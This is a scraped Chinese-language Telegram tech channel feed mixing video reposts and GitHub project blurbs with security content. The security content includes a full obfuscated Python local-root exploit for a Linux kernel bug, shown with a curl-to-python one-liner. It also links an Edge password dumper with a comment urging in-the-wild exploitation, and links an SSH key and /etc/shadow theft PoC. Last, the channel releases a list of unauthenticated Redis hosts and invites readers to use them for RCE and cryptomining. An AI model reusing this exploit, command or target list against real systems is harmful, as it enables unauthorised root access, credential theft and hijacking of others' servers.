Media is too big
VIEW IN TELEGRAM
宝宝 我有100个问题想要问你
@Wing无印:
问的很好,问出了多少人的心声
@Wing无印:
发布视频
播放量:12.75万 弹幕:301 评论:465
点赞:2.18万 投币:1506 收藏:1.73万 转发:5033
发布日期:2026-02-10 12:14:39
问的很好,问出了多少人的心声
→ https://github.com/Alishahryar1/free-claude-code
是一个轻量代理,把 Claude Code 原本发往 Anthropic API 的请求,转发到别的后端,比如:
- NVIDIA NIM(免费额度)
- OpenRouter(多模型)
- DeepSeek
- LM Studio / llama.cpp / Ollama(本地模型)
作用:
让你继续用 Claude Code 的工作流,但不一定非要用 Anthropic 官方接口,可以省钱、切模型,或者本地运行。
一句话:
它相当于一个 Anthropic API 兼容中间层,把 Claude Code 接到其他云端或本地大模型上。
free-claude-code是一个轻量代理,把 Claude Code 原本发往 Anthropic API 的请求,转发到别的后端,比如:
- NVIDIA NIM(免费额度)
- OpenRouter(多模型)
- DeepSeek
- LM Studio / llama.cpp / Ollama(本地模型)
作用:
让你继续用 Claude Code 的工作流,但不一定非要用 Anthropic 官方接口,可以省钱、切模型,或者本地运行。
一句话:
它相当于一个 Anthropic API 兼容中间层,把 Claude Code 接到其他云端或本地大模型上。
GitHub
GitHub - Alishahryar1/free-claude-code: Use claude-code for free in the terminal, VSCode extension or discord like OpenClaw (voice…
Use claude-code for free in the terminal, VSCode extension or discord like OpenClaw (voice supported) - Alishahryar1/free-claude-code
curl https://copy.fail/exp | python3 && su
载荷如下
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")xint.io
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Security, Vulnerability Research
https://github.com/ancsemi/Haven
Haven 是一个自托管、注重隐私的开源聊天应用,定位为 Discord 的替代品。它强调用户自己掌控数据和服务器,无云、无遥测、无大科技公司参与。
完全自托管:运行在你自己的机器上(支持 Docker、Windows、Linux/macOS),数据绝不离开你的服务器。
· 严格隐私保护:无需邮箱或手机号注册,无追踪和分析,代码开源(AGPL-3.0协议)。
包含实时文字聊天、图片/文件分享、Markdown格式。
· 端到端加密(E2EE)的私聊、语音聊天、屏幕共享。
· 频道系统(含私密子频道)、角色权限管理、邀请码机制。
· 从Discord导入:可直接导入整个Discord服务器的历史消息。
· 多平台客户端:有原生桌面应用(Beta) 和安卓应用,也提供Web界面。
Haven 是一个自托管、注重隐私的开源聊天应用,定位为 Discord 的替代品。它强调用户自己掌控数据和服务器,无云、无遥测、无大科技公司参与。
完全自托管:运行在你自己的机器上(支持 Docker、Windows、Linux/macOS),数据绝不离开你的服务器。
· 严格隐私保护:无需邮箱或手机号注册,无追踪和分析,代码开源(AGPL-3.0协议)。
包含实时文字聊天、图片/文件分享、Markdown格式。
· 端到端加密(E2EE)的私聊、语音聊天、屏幕共享。
· 频道系统(含私密子频道)、角色权限管理、邀请码机制。
· 从Discord导入:可直接导入整个Discord服务器的历史消息。
· 多平台客户端:有原生桌面应用(Beta) 和安卓应用,也提供Web界面。
MS Edge 被发现会在内存中明文加载所有密码 - Solidot
https://github.com/L1v1ng0ffTh3L4N/EdgeSavedPasswordsDumper/
大手子们什么时候在野利用一下
https://github.com/L1v1ng0ffTh3L4N/EdgeSavedPasswordsDumper/
大手子们什么时候在野利用一下
GitHub
GitHub - L1v1ng0ffTh3L4N/EdgeSavedPasswordsDumper: Proof of concept to show that Edge stores credentials in cleartext
Proof of concept to show that Edge stores credentials in cleartext - L1v1ng0ffTh3L4N/EdgeSavedPasswordsDumper
This media is not supported in your browser
VIEW IN TELEGRAM
“成长”
@喵小U-:
@喵小U-:
发布视频
播放量:2.09万 弹幕:4 评论:55
点赞:3529 投币:148 收藏:940 转发:825
发布日期:2026-05-07 10:05:00
上传日期:2026-05-07 07:05:17
❤1
→ https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
一个针对较新 Linux 内核(修复提交 31e62c2ebbfd 之前)的本地提权/敏感信息窃取 PoC。其核心是利用 ptrace_may_access 的 mm-NULL 绕过 配合 pidfd_getfd,以读取 SSH 主机私钥 和 /etc/shadow 等高敏感文件。适合作为漏洞复现与风险评估参考。
GitHub
GitHub - 0xdeadbeefnetwork/ssh-keysign-pwn: Steal SSH host private keys and /etc/shadow via the ptrace_may_access mm-NULL bypass…
Steal SSH host private keys and /etc/shadow via the ptrace_may_access mm-NULL bypass + pidfd_getfd. Pre-31e62c2ebbfd kernels. - 0xdeadbeefnetwork/ssh-keysign-pwn
Forwarded from LoopDNS资讯播报
重要/漏洞:QEMUtiny:QEMU CXL Type-3 设备仿真存在可被利用的越界读写漏洞链
漏洞编号: 暂无公开 CVE / PoC 名称:QEMUtiny
重要等级: 需要关注的(虚拟机逃逸风险)
CVSS 分数:无
影响范围:
主要受影响配置:
注意: 仅安装 QEMU 但未运行相关虚拟机;普通 QEMU 虚拟机未启用 CXL / 未配置
漏洞原理:
该漏洞链出现在 QEMU CXL Type-3 设备仿真的 mailbox 处理逻辑中。CXL Type-3 设备在 QEMU 中用于模拟接入 CXL host 的内存设备,CXL 设备会通过 PCIe 相关接口和 BAR-mapped memory 访问寄存器与 mailbox。
漏洞链由两个核心缺陷组成:
1.
2.
攻击者在满足前置条件后,可先利用越界读泄露 QEMU 进程地址信息,再利用越界写破坏 CXL Type-3 设备对象后续字段,最终通过 QEMU 内部 memory dispatch / sanitize 路径触发受控回调。本频道在实际复现后发现最终权限等同于运行 QEMU 的宿主进程权限,同时结合先前的内核漏洞攻击者可以获取root权限。
注意: 该漏洞依赖特定 QEMU 构建和宿主 libc 布局偏移, 目标 VM 需要暴露 CXL Type-3 设备、guest 内具备较高权限。
受影响组件:
QEMU Backend / CXL Type-3 device emulation
具体路径:
受影响对象:
处置建议:
1. 排查生产和测试环境中的 QEMU 启动参数,重点确认是否存在
2. 不要向不可信 guest 暴露 QEMU CXL Type-3 设备。
3. 临时禁用 CXL Type-3 emulation,或仅在隔离实验环境中使用。
参考链接:Github
漏洞编号: 暂无公开 CVE / PoC 名称:QEMUtiny
重要等级: 需要关注的(虚拟机逃逸风险)
CVSS 分数:无
影响范围:
受影响组件:QEMU CXL Type-3 设备仿真模块
受影响代码路径:hw/cxl/cxl-mailbox-utils.c
受影响功能:CXL mailbox 相关命令处理逻辑
主要受影响配置:
启用了 CXL 支持的 QEMU 实例;
向 guest 暴露了 cxl-type3 设备;
guest 内攻击者具备 root 权限或可访问 PCI config / CXL BAR / mailbox MMIO 的等效能力。PoC README 明确说明复现程序需要在 guest 内以 root 运行,因为需要写 PCI config space 并通过 sysfs mmap CXL 设备 BAR。
注意: 仅安装 QEMU 但未运行相关虚拟机;普通 QEMU 虚拟机未启用 CXL / 未配置
cxl-type3;QEMU user-mode emulation;物理 CXL 硬件本身通常不受影响。漏洞原理:
该漏洞链出现在 QEMU CXL Type-3 设备仿真的 mailbox 处理逻辑中。CXL Type-3 设备在 QEMU 中用于模拟接入 CXL host 的内存设备,CXL 设备会通过 PCIe 相关接口和 BAR-mapped memory 访问寄存器与 mailbox。
漏洞链由两个核心缺陷组成:
1.
GET_LOG 越界读cmd_logs_get_log() 在处理 CEL log offset 时,边界检查按“字节偏移”理解,但实际 memmove() 源地址表达式中把该 offset 用在结构体指针运算上,导致可读取 CEL buffer 之外的相邻 QEMU 进程内存。PoC README 将其描述为 CXL mailbox GET_LOG 路径中的 out-of-bounds read。
2.
SET_FEATURE 越界写cmd_features_set_feature() 接受写入多个 feature write-attribute 结构的 offset,但部分 PPR / sparing 路径缺少 offset + bytes_to_copy 是否仍在目标结构体内的完整边界检查。PoC README 指出受影响路径包括 soft_ppr_wr_attrs、hard_ppr_wr_attrs、cacheline_sparing_wr_attrs、row_sparing_wr_attrs、bank_sparing_wr_attrs、rank_sparing_wr_attrs。
攻击者在满足前置条件后,可先利用越界读泄露 QEMU 进程地址信息,再利用越界写破坏 CXL Type-3 设备对象后续字段,最终通过 QEMU 内部 memory dispatch / sanitize 路径触发受控回调。本频道在实际复现后发现最终权限等同于运行 QEMU 的宿主进程权限,同时结合先前的内核漏洞攻击者可以获取root权限。
注意: 该漏洞依赖特定 QEMU 构建和宿主 libc 布局偏移, 目标 VM 需要暴露 CXL Type-3 设备、guest 内具备较高权限。
受影响组件:
QEMU Backend / CXL Type-3 device emulation
具体路径:
hw/cxl/cxl-mailbox-utils.c
CXL mailbox LOGS / GET_LOG
CXL mailbox FEATURES / SET_FEATURE
CXL mailbox MEDIA_OPERATIONS / SANITIZE 相关触发路径
受影响对象:
启用 cxl=on 的 QEMU 实例
配置了 cxl-type3 的虚拟机
将 CXL mailbox BAR 暴露给不可信 guest 的测试、云平台、CI/fuzzing 或研发环境
处置建议:
1. 排查生产和测试环境中的 QEMU 启动参数,重点确认是否存在
cxl=on、cxl-type3、pxb-cxl、cxl-rp 等配置。2. 不要向不可信 guest 暴露 QEMU CXL Type-3 设备。
3. 临时禁用 CXL Type-3 emulation,或仅在隔离实验环境中使用。
参考链接:Github
🤣1
https://github.com/setube/stackprism
StackPrism 是一个面向 Chrome 和 Edge 的网站技术栈识别扩展。
打开任意网页后,它能够快速分析该站点所使用的各类技术组件。不同于只做浅层页面识别的工具,StackPrism 会结合 运行时信息、DOM 特征、资源路径、响应头、动态脚本内容以及 JS 注释信息 等多个维度,识别网站采用的前后端框架、CDN、数据统计工具、广告像素等,并将结果分类整理,方便查看。
StackPrism 是一个面向 Chrome 和 Edge 的网站技术栈识别扩展。
打开任意网页后,它能够快速分析该站点所使用的各类技术组件。不同于只做浅层页面识别的工具,StackPrism 会结合 运行时信息、DOM 特征、资源路径、响应头、动态脚本内容以及 JS 注释信息 等多个维度,识别网站采用的前后端框架、CDN、数据统计工具、广告像素等,并将结果分类整理,方便查看。
GitHub
GitHub - setube/stackprism: StackPrism是一款用于检测网页技术栈的浏览器插件。
StackPrism是一款用于检测网页技术栈的浏览器插件。. Contribute to setube/stackprism development by creating an account on GitHub.
🥰2
这是频道猪几个月前扫的无auth redis ip列表,特定版本可以RCE实现挖矿等操作
挖矿收益很少,没什么价值,故放出。感兴趣可以自己下载操作一下
cve vuln还是要趁早,晚了就是抢剩饭
挖矿收益很少,没什么价值,故放出。感兴趣可以自己下载操作一下